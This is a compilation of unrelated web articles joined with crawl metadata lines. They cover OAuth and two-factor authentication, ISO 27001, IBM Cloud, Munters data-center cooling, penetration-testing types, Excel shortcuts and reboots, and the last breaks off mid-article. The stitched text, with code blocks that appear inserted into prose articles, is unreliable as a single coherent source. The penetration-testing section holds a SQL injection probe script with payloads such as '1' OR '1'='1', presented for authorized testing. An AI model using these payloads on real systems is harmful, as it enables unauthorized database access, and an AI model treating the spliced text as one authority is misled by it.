Many sites now support OAuth for managing authentication. Essentially, OAuth is a protocol in which a site asks a provider (like Facebook or Twitter) to verify a user’s identity without having to reveal that user’s password to the inquiring site. This way, the site can create user accounts without having to store passwords. Instead, the site ties your identity to a token that the provider verifies. You prove your identify to Facebook (with a password) and Facebook proves to the site that you are who you claim to be.
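As a sketch of what happens under the hood, the first step of a typical OAuth 2.0 authorization-code flow is just a redirect to the provider with a few query parameters; every value below is an illustrative placeholder.

```python
from urllib.parse import urlencode

params = {
    "response_type": "code",                 # ask for an authorization code
    "client_id": "example-site-id",          # issued when the site registers
    "redirect_uri": "https://site.example/callback",
    "scope": "basic_profile",                # request only what you need
    "state": "random-anti-forgery-token",    # tie the callback to this session
}
print("https://provider.example/oauth/authorize?" + urlencode(params))
```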
If a site allows you to migrate an existing account from a password-based authentication scheme to an OAuth-based one, make the switch. Otherwise, keep this option in mind whenever you create an account in the future.
But there’s a catch. A few, actually. OAuth shifts a site’s security burden from password management to token management and correct protocol implementation. It also introduces privacy considerations related to centralizing auth to a provider as well as how much providers share data.
Be wary about how sites mix authentication and authorization. Too many sites ask for access to your data in exchange for using something like Facebook Connect. Under OAuth, the site can assume your identity to the degree you’ve authorized, from reading your list of friends to posting status updates on your behalf.
Grant the minimum permissions whenever a site requests access (i.e. authorization) to your data. Weigh this decision against your desired level of privacy and security. For example, a site or mobile app might insist on access to your full contacts list or the ability to send Tweets. If this is too much for you, then forego OAuth and set up a password-based account.
(The complexity of OAuth has many implications for users and site developers. We’ll return to this topic in future articles.)
Two-Factor Auth — One Equation in Two Unknowns
Many sites now support two-factor auth for supplementing your password with a temporary passcode. Use it. This means that access to your account is contingent on both knowing a shared secret (the password you’ve given the site) and being able to generate a temporary code.
Your password should be known only to you because that’s how you prove your identity. Anyone who knows that password — whether it’s been shared or stolen — can use it to assume your identity within that account.
A second factor is intended to be a stronger proof of your identity by tying it to something more unique to you, such as a smartphone. For example, a site may send a temporary passcode via text message or rely on a dedicated app to generate one. (Such an app must already have been synchronized with the site; it’s another example of a shared secret.) In either case, you’re proving that you have access to the smartphone tied to the account. Ideally, no one else is able to receive those text messages or generate the same sequence of passcodes.
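Those temporary passcodes are usually time-based one-time passwords (TOTP, RFC 6238): the site and the app derive the same six digits from a shared secret and the current time. A minimal sketch of the algorithm:

```python
import base64, hashlib, hmac, struct, time

def totp(secret_b32: str, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HMAC-SHA1 over the current 30-second time counter."""
    key = base64.b32decode(secret_b32, casefold=True)
    counter = struct.pack(">Q", int(time.time()) // step)
    digest = hmac.new(key, counter, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))  # example shared secret; output changes every 30 s
```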
The limited lifespan of a passcode is intended to reduce the window of opportunity for brute force attacks. Imagine an attacker knows the account’s static password. There’s nothing to prevent them from guessing a six-digit passcode. However, they only have a few minutes to guess one correct value out of a million. When the passcode changes, the attacker has to throw away all previous guesses and start the brute force anew.
The two factor auth concept is typically summarized as the combination of “something you know” with “something you possess”. It really boils down to combining “something easy to share” with “something hard to share”.
Beware Password Recovery — It’s Like Shouting Secret in a Crowded Theater
If you’ve forgotten your password, use the site’s password reset mechanism. And cross your fingers that the account recovery process is secure. If an attacker can successfully exploit this mechanism, then it doesn’t matter how well-chosen your password was (or possibly even if you’re relying on two-factor auth).
If the site emails you your original password, then the site is insecure and its developers are incompetent. It implies the password has not even been hashed.
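A competent site stores only a salted, slow hash of your password, never the password itself. Here is a minimal sketch using Python's standard library; the scrypt parameters are illustrative, and hashlib.scrypt requires OpenSSL support.

```python
import hashlib, hmac, os

def hash_password(password: str) -> tuple[bytes, bytes]:
    """Return (salt, digest) using the memory-hard scrypt KDF."""
    salt = os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1)
    return salt, digest

def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    candidate = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1)
    return hmac.compare_digest(candidate, digest)  # constant-time comparison

salt, digest = hash_password("kar120c")
print(verify_password("kar120c", salt, digest))    # True
print(verify_password("password1", salt, digest))  # False
```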
If the site relies on security questions, consider creating unique answers for each site. This means you’ll have to remember dozens of question/response pairs. Make sure to encrypt this list with something like the OS X Keychain.
Review Your OAuth Grants
For sites you use as OAuth providers (like Facebook, Twitter, LinkedIn, Google+, etc.), review the third-party apps to which you’ve granted access. You should recognize the sites that you’ve just gone through a password refresh for. Delete all the others.
Where possible, reduce permissions to a minimum. You’re relying on this for authentication, not information leakage.
Use HTTPS Whenever Possible
Universal adoption of HTTPS remains elusive. Fortunately, sites like Facebook and Twitter have set this by default. If the site has an option to force HTTPS, use it. After all, if you’re going to rely on these sites for OAuth, then the security of these accounts becomes paramount.
Maintain Constant Vigilance
Keep your browser secure. Keep your system up to date. Set a reminder to go through this all over again a year from now — if not earlier.
Otherwise, you risk losing more than one account should your password be exposed among the millions. You are not a number, you’re a human being.
What is ISO 27001: Information Security Standard?
As an information security standard, ISO 27001 can be beneficial to understand and comply with, but what exactly is ISO 27001?
What does ISO 27001 mean? ISO 27001 is a standard for Information Security Management Systems that describes the physical and logical controls an organization should implement to protect its information more methodically.
What Are ISO 27000 Standards?
The International Organization for Standardization (ISO) is an international organization dedicated to developing practical standards around technical and professional operations such that any organization can follow them.
The ISO 27000 series is one such group of standards published by the ISO to address cybersecurity concerns in private organizations. This series covers several approaches to cybersecurity, from IT and network security to auditor guidelines and industry-specific practices.
Some of the primary documents in this series, found in the earliest sequential publications, include:
- ISO/IEC 27001, “Information technology – security techniques – information security management systems – requirements”: ISO 27001 covers the specifics of creating and implementing Information Security Management Systems (ISMS), which we will cover in more detail in this blog.
- ISO/IEC 27002, “Information security, cybersecurity and privacy protection – information security controls”: A list of specific security controls that may be used as part of an ISMS.
- ISO/IEC 27003, “information security management system implementation guidance”: As the title implies, this document guides on implementing ISMSs. More specifically, this will break down the requirements outlined in ISO 27001 to provide specifics on how to implement them in real-world enterprise situations.
- ISO/IEC 27004, “Information technology – security techniques, information security management – monitoring, measurement, analysis, and evaluation”: This publication provides specific requirements and practices that enterprises using an ISMS would use to evaluate effectiveness. This practice includes creating metrics, measuring data, monitoring system components, and more.
These are just the tip of this iceberg, as the ISO 27000 series has over 60 individual publications. For the most part, however, ISO 27001 is the most commonly adopted standard.
What Is ISO 27001?
ISO 27001 is a standard for developing an ISMS, a unique designation for an organization-wide network of people, processes, rules, and technologies that promote security. These can include documented processes or informal practices for specific problems, but both will fall under an overarching management plan tailored to specific security goals.
What Is an Information Security Management System?
In the broadest sense, an ISMS focuses on addressing the so-called CIA triad of security concerns:
- Confidentiality: That data remains confidential and secured against unauthorized disclosure.
- Integrity: That data remains whole and unaltered, protected against malicious tampering and against corruption through improper processing or technology failures.
- Availability: That data remains accessible to authorized persons for business use or customer/client/patient support.
Furthermore, an ISMS will allow an organization to accomplish a set of objectives, including:
- Identifying stakeholders in an organization to determine IT security expectations
- Identifying risks to technology and data security
- Defining security controls to address concerns and expectations and mitigate risks
- Setting security objectives organization-wide for IT systems
- Implementing controls and mitigation efforts in line with security objectives
- Measuring and monitoring controls for effectiveness
- Improving controls in cases of new threats, breaches, or ineffective operation
The ISMS isn’t a specific set of technology, but the governance policies around what needs to be secured, how, by whom, and how effectively. The ISMS, therefore, should be able to address compliance and legal requirements, organizational and enterprise goals, and operational necessities like data usability and budget.
What Are the ISO 27001 Requirements?
The ISO 27001 documentation defines several requirements for an ISMS. These requirements are defined in this document, and any future documents take these requirements as a reference in helping an organization implement the ISMS.
The requirements of an ISMS are:
- Context and Organization: Your organization must understand its own business context, including security needs, internal and external stakeholders, industry and regulatory standards, and potential fallout from ineffective security or data breach.
- Leadership: Your organization must have the leadership to create, implement, and maintain an ISMS. This can include specific executives (CIOs, CTOs, CISOs), compliance officers, IT management, and stakeholders or their representatives.
- Planning: Your organization should plan the ISMS with clear information (usually from knowledge fulfilling the first requirement). This can also include vulnerability scans, risk assessments, and other diagnostics.
- Support: Your organization must be able to allocate and distribute resources to teams managing the ISMS. This includes having the ability to communicate with team members, create organization-wide policies and education, and distribute guides, documentation, and best practices.
- Operation: All processes for any aspect of the ISMS must be implemented and controlled. This includes implementing risk assessments for those processes.
- Evaluation: Your organization must monitor, analyze, and assess the ISMS during its operation. This calls for internal audits and reviews.
- Improvement: Based on the results of any internal tests, measurements, or audits, your organization should be able to implement changes and improvements, including system upgrades, retirement and replacement of equipment, changes to policies, or mitigation efforts following breaches.
The 14 Domains of ISO 27001
Finally, the requirements of ISO 27001 will cover 14 specific domains, including several control categories, of security and operations in your organization. These domains include:
- Information Security Policies, or aligning security policies with company goals
- Information Security Organization, or the establishment of management and personnel structures and maintaining the security of tools used by those teams.
- Human Resource Security, or securing personnel and data involved in HR operations.
- Asset Management, or the identification, classification, and protection of governed assets – including data and processing resources.
- Access Control, or maintaining restricted access to processing and data resources for only authorized users related to their role in the organization.
- Cryptography, or the obfuscation of data at rest or in transit.
- Physical and Environmental Security, or protecting physical processing facilities against damage, theft, or disaster.
- Operations Security, or the safeguarding of processing facilities against unauthorized access or data loss.
- Communications Security, or data protection as it moves through business networks.
- System Acquisition, Development, and Maintenance, or the securely strategizing and planning of acquiring, expanding, and retiring system equipment.
- Supplier Relations, or analyzing third-party vendor relationships and agreements
- Information Security Incident Management, or detecting and responding to security issues as they happen.
- Information Security Aspects of Business Continuity, or ensuring that security measures will remain effective in cases of business disruptions.
- Compliance, or integrating any regulations or frameworks specific to business or industry operations.
Stay On Top of ISO 27001 Certification with 1Kosmos
While ISO 27001 isn’t a mandatory regulation, it is a strong and productive framework around which organizations should build their cybersecurity and compliance efforts. It touches on several baseline security elements considered best practices across most industries.
1Kosmos BlockID provides this level of security with the following features:
- Private and Permissioned Blockchain: 1Kosmos protects personally identifiable information in a private and permissioned blockchain and encrypts digital identities so they are accessible only by the user. The distributed properties ensure there are no databases to breach or honeypots for hackers to target.
- Identity-Based Authentication: We push biometrics and authentication into a new “who you are” paradigm. BlockID uses biometrics to identify individuals, not devices, through credential triangulation and identity verification.
- Cloud-Native Architecture: Flexible and scalable cloud architecture makes it simple to build applications using our standard API and SDK.
- Identity Proofing: BlockID verifies identity anywhere, anytime and on any device with over 99% accuracy.
- Privacy by Design: Embedding privacy into the design of our ecosystem is a core principle of 1Kosmos. We protect personally identifiable information in a distributed identity architecture, and the encrypted data is only accessible by the user.
- Interoperability: BlockID can readily integrate with existing infrastructure through its 50+ out-of-the-box integrations or via API/SDK.
Introduction to IBM Cloud
In this digital era, it is all about data and storage, and this has created the need for cloud computing and cloud storage. There are various reputed cloud platforms, and one of them is IBM Cloud.
Whether this is the first time you are hearing about IBM Cloud or you are interested in learning more about it, you are in the right place.
In this article, you will get a basic understanding of IBM Cloud and its features. But before that, here is a short introduction to cloud computing.
What is Cloud Computing?
In simple words, the cloud refers to virtual storage space or computing resources that are not physically owned by the user but are used for his or her business.
Rapid development in the IT sector has created the need for more storage, servers, analysis, and research. To reduce operating costs, the required resources are purchased from cloud computing platforms, which provide services such as servers, storage, software, analytics, and artificial intelligence over the internet.
What is IBM Cloud?
IBM Cloud is the suite of cloud computing services from the American information technology company IBM, providing both Platform as a Service (PaaS) and Infrastructure as a Service (IaaS).
The platform is designed to serve the full range of applications, from small development teams and organizations to large enterprise businesses. The IBM Cloud network has more than 60 data centers and server locations in 19 countries around the globe.
It supports various programming languages such as Java, PHP, and Python, and it supports modern cloud-native apps, microservices, and the Internet of Things (IoT).
Product and Services covered under IBM Cloud:
The IBM Cloud catalog lists over 170 services in different categories; here are some of them:
- Computing – bare metal servers, virtual servers, and other computing resources
- Storage – Storage of Images, files, Data, and other objects
- Security – Activity tracking, Access management, authentication, etc…
- Analytics – Data Science tools like Apache Spark, Apache Hadoop, and IBM Watson Machine Learning, and also Analytics for streaming data.
- Internet of Things (IoT) – IBM’s IoT and the data produced by them.
- Blockchain – Software-as-a-Service (SaaS) to develop apps and monitor blockchain networks.
- Network – load balance, Content Delivery Network (CDN), Virtual Private Network (VPN), and firewalls.
- Data Management – SQL and NoSQL databases, data querying, and migration tools.
- Mobile – Helps in building and monitoring mobile applications and their back-end components.
- Developer and Migration Tools – Command-line Interface (CLI), tools for continuous delivery, application pipelines, continuous release, and migration tools like the IBM Lift CLI and Cloud Mass Data Migration (see the short CLI session after this list).
- Integration – Provides various integration options such as API Connect, IBM Secure Gateway, and App Connect.
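To give a feel for how these services are driven in practice, here is a short session with the IBM Cloud CLI (ibmcloud). The region, instance name, and plan below are illustrative assumptions, not recommendations.

```bash
ibmcloud login                        # authenticate to IBM Cloud
ibmcloud target -r us-south           # pick a region to work in
ibmcloud resource service-instances   # list the services you have provisioned
# Provision an Object Storage instance (name and plan are placeholders):
ibmcloud resource service-instance-create my-cos cloud-object-storage lite global
```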
Types of IBM Cloud Plans
The cloud services provided by IBM can be divided into three types; here they are:
i) Public Cloud
Here the users rent the cloud resources on a subscription basis or usage-based fee. Everything is managed and owned by IBM. You don’t need to own any software or hardware; everything will be available under your plan.
IBM Cloud is trusted by 47 of the Fortune 50 companies, the 10 largest banks, and 8 of the 10 largest airlines. It has various advantages, including ease of use, industry-leading compliance, threat monitoring, and security.
ii) Private Cloud
Here, instead of renting space on a public server, you are allocated your own private cloud space, which is fully under your control. Companies choose IBM private cloud to meet regulatory compliance requirements or to handle confidential documents, intellectual property, medical records, financial data, or other sensitive data.
The IBM Private Cloud has the following advantages – elasticity, scalability, ease of service delivery, control, security, and resource customization.
iii) Hybrid Cloud
IBM Hybrid Cloud refers to an integrated environment of both private and public cloud. The hybrid cloud helps companies easily manage speed, security, latency, and performance, and it is more cost-efficient than doing business with a private or public cloud alone.
It is said that in the next three years, 75% of existing non-cloud apps will move to the cloud, and that the cloud journey has only just begun. Compared to other cloud platforms, IBM has many advantages, so if you are planning a move to the cloud, IBM is a good choice for you.
If you have any questions or doubts, leave them in the comment section below, and if you want to know more about any other cloud platforms, please let us know.
Data centers are getting denser, much denser. In 2017 a majority of operators – 67 percent – reported an average rack density of below six kilowatts (kW), and just nine percent had average densities of over 10kW per rack according to numbers from the Uptime Institute.
But as of 2022, the average rack density has crept up to eight to ten kW per rack. Meanwhile, 25 percent of data centers are now reporting rack densities of over 20kW, and five percent now have densities north of 50kW.
Some analysts have even predicted that by 2025, average densities could reach 15 to 20kW per rack. While multi-story developments have become increasingly common, the growing densities may limit data centers in the future to one or two stories in order for the heat rejection equipment to fit on data center roofs.
This trend of denser data centers is unlikely to disappear soon. Many of the areas that need data the most are getting much stricter in terms of how they issue planning permissions. For instance, due to concerns about the capacity of Ireland’s grid, the country’s national electricity grid operator – Eirgrid – has stopped issuing new connections to data centers in the Dublin area until 2028.
Of course, larger, denser data centers are now producing more raw heat than ever, which, with space being at a premium, can often mean less room to accommodate the cooling systems required to tackle such loads.
DCD spoke to industry stalwart Keith Dunnavant of Munters, a global specialist in energy-efficient air treatment and climate solutions, to find out how the company’s award-winning cooling system, SyCool Split, can help operators keep their cool, no matter the size of their facility.
A problem shared
With a split system approach to cooling units, Dunnavant explains, you only have to deal with the heat absorption component of the cooling process from inside the building. The heat is transported by water or refrigerant piping to external heat rejection equipment, installed on the roof or around the building perimeter, where ultimately the heat is rejected into the ambient air.
“Having the heat absorption process decoupled from the heat rejection process is the most space-efficient and practical approach to accommodate rising heat densities. Compared to packaged air-handling units, large ductwork is replaced by relatively small interconnected piping.
“In the case of air cooling, it's practically impossible to move all the hot air to package units, and deliver the cooled air back down to the data halls, once you get above a two-story data center,” says Dunnavant.
In the Munters SyCool system, there is a separate indoor evaporator (heat absorber) and an outdoor condenser (heat rejector). A low GWP (Global Warming Potential) refrigerant – a type of working fluid used to transfer energy – flows into the evaporator in a liquid state.
As the hot air or liquid from the data center flows through the heat exchangers within the SyCool air-handler (CRAH) or LCEs (Liquid Cooling Evaporators), the liquid refrigerant changes phase to a vapor. This vapor flows up through pipes (risers), transporting the heat up to the condensers where the heat is rejected into the atmosphere, converting the vapor refrigerant back to a liquid, and allowing gravity to transport the liquid through “downcomer” pipes back to the evaporators to begin the cycle over again.
This process of moving heat naturally, by phase change and gravity, is called a thermosyphon. Thermosyphons are an energy-efficient approach to heat exchange, since they require no pumps and offer other benefits compared to more conventional chilled water approaches.
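The energy balance behind a thermosyphon is simple: at steady state, the vapor only needs to carry the heat load via its latent heat of vaporization, so the required circulation rate is the load divided by that latent heat. A back-of-the-envelope sketch, where the 170 kJ/kg latent heat is an assumed order-of-magnitude value for a low-GWP refrigerant rather than a published SyCool figure:

```python
def refrigerant_mass_flow(heat_load_kw: float, latent_heat_kj_per_kg: float) -> float:
    """Steady-state vapor mass flow (kg/s) to move a heat load by phase change alone."""
    return heat_load_kw / latent_heat_kj_per_kg  # kW / (kJ/kg) = kg/s

# Assumed values: one 250 kW SyCool block, latent heat ~170 kJ/kg.
flow = refrigerant_mass_flow(250.0, 170.0)
print(f"{flow:.2f} kg/s of refrigerant, moved by gravity alone")  # ~1.47 kg/s
```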
“Thermosyphon technology is not new, it's been around for quite a long time. However, Munters is the first to apply the technology to data center heat rejection at large scale,” Dunnavant explains.
“Normally in the classic example, where the condensers are on the roof, the refrigerant flows up to V-shaped banks of coils that ambient air is drawn over using axial, variable speed fans, to condense thermosyphon vapor refrigerant to a liquid.”
There are two methods for condensing vapor refrigerant back to a liquid with SyCool: a) when the ambient air is cool, thermosyphon condenser coils perform the work (passive condensing) and b) as the ambient air dry-bulb temperature exceeds the economizing threshold, brazed plate heat exchangers (active condensers) perform the work.
The active condensers have conventional DX refrigeration on one side of the brazed plate heat exchangers, to absorb the heat from the thermosyphon refrigerant, which flows through the opposite side of the heat exchanger, where the vapor is condensed back to a liquid. The active condenser begins assisting with the condensing process as needed, as the outdoor air temperature rises.
Advantages of this approach are: a) no pumps are required to circulate the working fluid (the refrigerant), as the process takes advantage of the physics of phase change and gravity; b) the working fluid is not at risk of freezing (a concern for water-based systems in cold climates); c) the approach is modular – installed in 125kW, 250kW, 400kW, 500kW, or 800kW (future) blocks – and scalable to accommodate future demand; and d) the economizer is superior to most other strategies, allowing compressors to remain off for many annual hours, keeping energy costs low. Additionally, as there are no pumps, there are fewer potential points of failure, enhancing reliability.
“Chilled water plants are now commonly used to cool large data centers, especially colos, and chillers using magnetic bearing compressors operating at high suction temperatures are quite efficient. However, the economizers (when included) paired with these chillers are often inefficient, forcing compressors to run until outdoor temperatures drop below about 40F, or continuously when there is no economizer. Additionally, the chilled water plant’s extensive piping, valves, pumping systems, and controls are both complex and expensive.”
A real pending issue, says Dunnavant, “is that as we move towards data centers utilizing both air and liquid cooling, the chilled water temperature must usually be selected to meet the needs of the air cooling, and is often suboptimal for liquid cooling. This is acceptable if liquid cooling is a small portion of the total, however, as the fraction of liquid cooling increases, the lost energy savings that could result from operating using warmer water temperatures begin to add up.”
With SyCool, each matched evaporator and condenser pair uses factory controls that operate optimally for each environment, either air or liquid cooling.
Cooling in a hotter world
Many modern data centers are required to operate under increasingly hot conditions. 2023 was the hottest year on record worldwide, and many data centers in key metropolitan areas such as London suffered outages, in part, because of their inability to cool effectively under the strain of record heat wave temperatures.
According to Dunnavant, another advantage of SyCool’s design is an abundance of heat transfer surface area in the external hardware.
“This allows you to achieve an economizer that can provide 100 percent of the cooling at really elevated ambient air temperatures. If you're trying to cool air at 95 Fahrenheit to 75 Fahrenheit, you can typically do that when the outdoor air temperature is in the low 60s Fahrenheit or below.
“A typical waterside economizer, that's integral to a chiller, is not able to do that until it's around 40 degrees Fahrenheit or below. The SyCool cycle can reject the bulk of the annual cooling load without using compressor energy, which can save substantial electrical power on an annual basis.”
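To put those economizer thresholds in perspective, here is a minimal sketch in Python (with illustrative cutoff temperatures and placeholder weather data, not Munters figures) of how a higher economizing cutoff translates into more compressor-off hours over a year:

```python
# Count the hours in which outdoor air alone can carry the cooling load.
# `hourly_temps_f` stands in for a year of hourly dry-bulb readings (8,760 values).

def economizer_hours(hourly_temps_f, cutoff_f):
    return sum(1 for t in hourly_temps_f if t <= cutoff_f)

hourly_temps_f = [38, 45, 55, 58, 61, 64, 72, 95]  # placeholder data

thermosyphon = economizer_hours(hourly_temps_f, cutoff_f=62)  # low-60s F cutoff
waterside = economizer_hours(hourly_temps_f, cutoff_f=40)     # ~40 F cutoff

print(f"Thermosyphon-style economizer: {thermosyphon}/{len(hourly_temps_f)} hours compressor-off")
print(f"Waterside-style economizer:    {waterside}/{len(hourly_temps_f)} hours compressor-off")
```

Fed with real hourly weather data for a site, the same comparison shows why a higher cutoff can eliminate compressor energy for the bulk of the year.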
Reducing energy consumption is of growing concern for data center operators, both for economic and sustainability reasons, and now also to reduce the strain on an aging electrical grid. In 2023, we’ve seen countries such as Germany and the UK push out regulations demanding energy efficiency standards from data center operators.
Ultimately, as the challenges of data center cooling continue to shift, the industry can certainly benefit from looking towards new methods of attacking these issues. That benefit comes not only in terms of cost savings and efficiency, but also in the effective rejection – and potential reuse – of heat from these facilities in order to create a more sustainable industry.
To find out more about Munters’ SyCool system please visit munters.com.
Have you ever wondered how companies secure their digital fortress from cyber threats?
Cyber-attacks are becoming more sophisticated every day. Understanding and using the different types of penetration testing is crucial.
In this blog, we’ll dive into the types of penetration testing. We’ll discuss its importance and cover methods to safeguard businesses.
What is Penetration Testing?
Penetration testing, or ethical hacking, simulates cyber attacks to find system vulnerabilities.
The goal is to test your digital defences for weaknesses. This helps identify vulnerabilities before hackers attack.
Ethical Hacking and Security Testing Methodologies
Ethical hacking is at the heart of penetration testing, where testers adopt a hacker’s mindset to uncover vulnerabilities.
Ethical hackers use security testing methodologies to identify and reduce risks for robust security.
Vulnerability Assessment vs Penetration Testing
While often mentioned together, vulnerability assessments and penetration testing serve different purposes.
A vulnerability assessment is the process of finding, ranking, and categorizing vulnerabilities within a system to address them. Vulnerability assessments are a very weak form of security auditing because they rely on automated tools, which are notorious for their false positives (fake findings, which waste your time and money) and false negatives (missed vulnerabilities).
Penetration testing, by contrast, exploits vulnerabilities to test security measures. It assesses real-world security effectiveness and is performed at least in part by experienced professionals, which means fewer missed vulnerabilities and zero false positives (fake findings) in a report.
Why Penetration Testing is Essential
The importance of penetration testing cannot be overstated. It helps identify vulnerabilities and formulates a strategic response to mitigate threats.
Understanding the various penetration testing types is the first step toward securing your digital assets.
The goal is to identify vulnerabilities before they can be exploited, whether in web applications, networks, or other targets.
Types of Penetration Testing
- Web Application Penetration Testing. This type of testing scrutinizes the security of web applications. It uncovers issues like SQL injection, cross-site scripting, and flaws in security settings. A thorough web app penetration test can safeguard your apps from outside threats (see the sketch after this list).
- Mobile or Desktop App Penetration Test. With the increasing use of mobile and desktop applications, securing them is paramount. This testing identifies vulnerabilities in applications running on various devices.
- Cloud Audit or Cloud Penetration Test. In today’s day and age, where everything tends to be deployed to AWS, Azure, Google Cloud Platform (GCP), Kubernetes, or Docker (with or without Infrastructure as Code such as Terraform), it is of paramount importance to audit the security of the cloud configuration to ensure there are no unintended security vulnerabilities that would allow, for example, a Docker read-only user to escalate privileges to AWS admin.
- Network Penetration Testing. Network penetration testing aims to discover security weaknesses within your network setup. It assesses firewalls, routers, switches, and the security policies that govern network access. This testing ensures that the internal network is secure against attacks. This may be performed from an internal perspective (aka “Assumed breached”) or an external perspective (discovering and targeting what is reachable from the internet).
- Social Engineering Tests. Social engineering tests check the human element of security. Testers use phishing, baiting, or pretexting to manipulate individuals into compromising security protocols. This highlights the need for robust security awareness training among employees. It may be part of an external penetration test and may also be called “red teaming”.
- Wireless Security Assessment. This assesses the security of wireless networks. Testers search for vulnerabilities to prevent unauthorized access to wireless networks. They aim to stop attacks such as eavesdropping and data theft.
- Internal and External Penetration Tests. Tests assess security posture from within or outside the organization. Internal tests mimic inside attacks. External tests simulate attacks by external threat actors.
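To make the web application testing above concrete, here is a minimal sketch of a boolean-based SQL injection probe in Python. The endpoint, parameter name, and payloads are hypothetical, and probes like this must only be run against systems you are explicitly authorized to test:

```python
# Minimal sketch of a boolean-based SQL injection probe, assuming the
# `requests` library and a hypothetical target with an `id` parameter.
import requests

TARGET = "https://example.com/product"  # hypothetical endpoint

baseline = requests.get(TARGET, params={"id": "1"}, timeout=10)
true_case = requests.get(TARGET, params={"id": "1' OR '1'='1"}, timeout=10)
false_case = requests.get(TARGET, params={"id": "1' AND '1'='2"}, timeout=10)

# If the TRUE payload matches the baseline while the FALSE payload differs,
# the parameter may be interpolated into a SQL query unsafely.
if (true_case.text == baseline.text) and (false_case.text != baseline.text):
    print("Parameter 'id' looks injectable - investigate manually.")
else:
    print("No obvious boolean-based injection signal.")
```

A real engagement would go far beyond this single check, but it illustrates the exploit-and-verify mindset that separates penetration testing from automated scanning.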
7ASecurity offers top-notch penetration testing services to protect businesses from cyber threats.
By understanding the diverse array of penetration testing types, companies can take a proactive approach to resolving cyber threats.
Ready to fortify your digital defences?
Visit 7ASecurity to learn about their services and how they can secure your operations from cyber threats. | <urn:uuid:a098ea10-4132-4c35-85a0-4d4152e3ba94> | CC-MAIN-2024-38 | https://7asecurity.com/blog/2024/04/types-of-penetration-testing/ | 2024-09-12T23:11:30Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651498.46/warc/CC-MAIN-20240912210501-20240913000501-00156.warc.gz | en | 0.914051 | 884 | 3.1875 | 3 |
Microsoft Excel has many moving parts…assuming you know how to move them, of course. For this week’s tip, we’re going over a few shortcuts to help you make the best use of some of these parts.
Perhaps the most basic Excel formatting of all, it can help to distinguish between your data to have different values aligned to the cell in different ways. Of course, there are keyboard shortcuts for each.
- To center the value within the cell, press Alt+H+A+C.
- To align the value within the cell to the left, press Alt+H+A+L.
- To align the value within the cell to the right, press Alt+H+A+R.
Oftentimes, the contents of your spreadsheet will require certain formatting in order to properly communicate their significance. You can assign this formatting for different data types with the following shortcuts:
- To return your value to general formatting, press Ctrl+Shift+~.
- To indicate that a value refers to currency, press Ctrl+Shift+$.
- To format a value as a percentage, press Ctrl+Shift+%.
- To properly format a date, press Ctrl+Shift+#.
- To format a value in scientific terms, press Ctrl+Shift+^.
- To apply the Number format with two decimal places and a thousands separator, press Ctrl+Shift+!.
- To properly format time, press Ctrl+Shift+@.
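If you also automate spreadsheets, the same formats can be applied programmatically. Below is a minimal sketch using the third-party openpyxl library (an assumption on our part; the format codes shown approximate what each shortcut applies):

```python
# Minimal sketch: applying Excel number formats in code with openpyxl.
# pip install openpyxl
from openpyxl import Workbook

wb = Workbook()
ws = wb.active

ws["A1"] = 1234.5
ws["A1"].number_format = "General"       # Ctrl+Shift+~
ws["A2"] = 1234.5
ws["A2"].number_format = "$#,##0.00"     # Ctrl+Shift+$
ws["A3"] = 0.25
ws["A3"].number_format = "0%"            # Ctrl+Shift+%
ws["A4"] = 45000                         # an Excel serial date
ws["A4"].number_format = "d-mmm-yy"      # Ctrl+Shift+#
ws["A5"] = 1234.5
ws["A5"].number_format = "0.00E+00"      # Ctrl+Shift+^
ws["A6"] = 1234.5
ws["A6"].number_format = "#,##0.00"      # Ctrl+Shift+!
ws["A7"] = 0.75
ws["A7"].number_format = "h:mm AM/PM"    # Ctrl+Shift+@

wb.save("formats_demo.xlsx")
```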
Borders can come in handy on a spreadsheet, as they make the distinctions between values more pronounced. Use the following shortcuts to apply borders to a selected cell (the Alt shortcuts below work within the Format Cells dialog, opened with Ctrl+1):
- To cut to the chase and apply an outline border to all of a cell’s edges, press Ctrl+Shift+&.
- To only add a borderline to the right edge of a cell, press Alt+R.
- To add a border to the left edge of a cell, press Alt+L.
- To put a border on the top edge of a cell, press Alt+T.
- To apply a border to the bottom edge of a cell, press Alt+B.
- To easily remove the borders from a cell, press Ctrl+Shift+_.
Okay, maybe this is the most basic Excel formatting, as these formatting needs can appear in essentially every Microsoft document you create, including your spreadsheets. These shortcuts should seem very familiar:
- To have your data appear in a bold font, press Ctrl+B.
- To type in italics, press Ctrl+I.
- To underline the contents of a cell, press Ctrl+U.
- To strikethrough the contents of a cell, press Ctrl+5.
We hope that this list comes in handy. We suggest printing it out so it can be easily accessible when needed. Are there any other program shortcuts that you’d like to know? Leave a few suggestions in the comments! | <urn:uuid:e5ec0e77-d4cf-4a0e-adb7-93a81561fc80> | CC-MAIN-2024-38 | https://ctnsolutions.com/tip-of-the-week-formatting-shortcuts-for-excel/ | 2024-09-14T04:12:58Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651548.18/warc/CC-MAIN-20240914025441-20240914055441-00056.warc.gz | en | 0.818155 | 604 | 3.484375 | 3 |
When you call tech support, you’re probably going to get the same response every single time: “Have you tried turning it off and on again?” There’s a reason that this happens so often, and it’s because restarting your computer is a great, low-tech way to resolve some basic issues with your system. However, it’s still good to be cautious about more serious issues that a reboot won’t fix. We’ll walk you through what a reboot does, and it can be effective at fixing minor issues with your PC.
What Happens When You Reboot
When you restart your PC, it can resolve a surprising number of problems. According to HowToGeek, most problems that lead to the failure of a Windows operating system are caused by misbehaving code: code that, for whatever reason, isn’t being processed correctly. This can be caused by something as simple as a failing driver or a hardware failure. Either way, something went wrong, and if this code isn’t processed properly, it can lead to what’s known as the “blue screen of death.”
Sometimes you might even notice that your computer is just acting sluggish or unstable, rather than experiencing a complete and total system block like a blue screen or error. Restarting your PC can often fix these problems.
Restarting your PC provides the operating system an opportunity to process the code properly and proceed as intended. Hopefully the problem works itself out, and you’ll be able to use the PC without further incident. In general, you can restart your computer whenever you’re experiencing poor computer performance. This gives your PC the chance to start fresh, and hopefully move forward with minimal complications.
Common Issues Solved By a System Restart
